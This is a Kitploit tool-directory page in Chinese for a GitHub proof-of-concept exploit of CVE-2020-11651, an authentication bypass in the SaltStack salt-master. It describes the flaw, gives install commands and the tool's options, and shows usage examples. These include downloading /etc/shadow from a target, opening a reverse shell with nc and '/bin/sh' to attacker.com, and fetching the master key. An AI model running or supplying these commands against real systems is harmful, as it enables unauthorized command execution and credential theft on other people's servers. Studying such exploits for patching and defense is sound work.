Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2020-11651 — CVE-2020-11651:概念验证 | Kitploit
工具/GitHubGitHub/0xc0d/cve-2020-11651
漏洞分析漏洞利用数据泄露渗透测试命令与控制远程访问工具
GitHub0xc0d/cve-2020-11651

CVE-2020-11651

CVE-2020-11651:概念验证

查看仓库
401425年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2020-11651

SaltStack Salt 在 2019.2.4 之前版本以及 3000 在 3000.2 之前版本中发现了一个问题。salt-master 进程中的 ClearFuncs 类未能正确验证方法调用。这允许远程用户在没有认证的情况下访问某些方法。这些方法可用于从 salt master 检索用户令牌,以及/或者在 salt minions 上执行任意命令。

详情

补丁 适用于不受支持的 salt 版本

安装

root@kitploit:~
git clone https://github.com/0xc0d/CVE-2020-11651.git ~/CVE-2020-11651
chmod +x ~/CVE-2020-11651/PoC.py

使用

root@kitploit:~
$ ~/CVE-2020-11651/PoC.py -h
usage: PoC.py [-h] --host HOST [--port PORT] [--execute COMMAND] [--upload src dest] [--download src dest] [--minions] [--quiet] [--fetch-key-only]

CVE-2020-11651 PoC

optional arguments:
  -h, --help            show this help message and exit
  --host HOST, -t HOST
  --port PORT, -p PORT
  --execute COMMAND, -e COMMAND
                        Command to execute. Defaul: /bin/sh (use netcat for reverse shell)
  --upload src dest, -u src dest
                        Upload a file
  --download src dest, -d src dest
                        Download a file
  --minions             Send command to all minions on master
  --quiet, -q           Enable quiet/silent mode
  --fetch-key-only      Only fetch the key

示例

下载 shadow 文件

root@kitploit:~
./PoC.py --host target.com --download /etc/shadow ./shadow

运行反向 shell

root@kitploit:~
nc -nvl attacker.com 9999
./PoC.py --host target.com --execute "nc attacker.com 9999 -e \"/bin/sh\""

获取密钥

root@kitploit:~
./PoC.py --host target.com --fetch-key-only
下载工具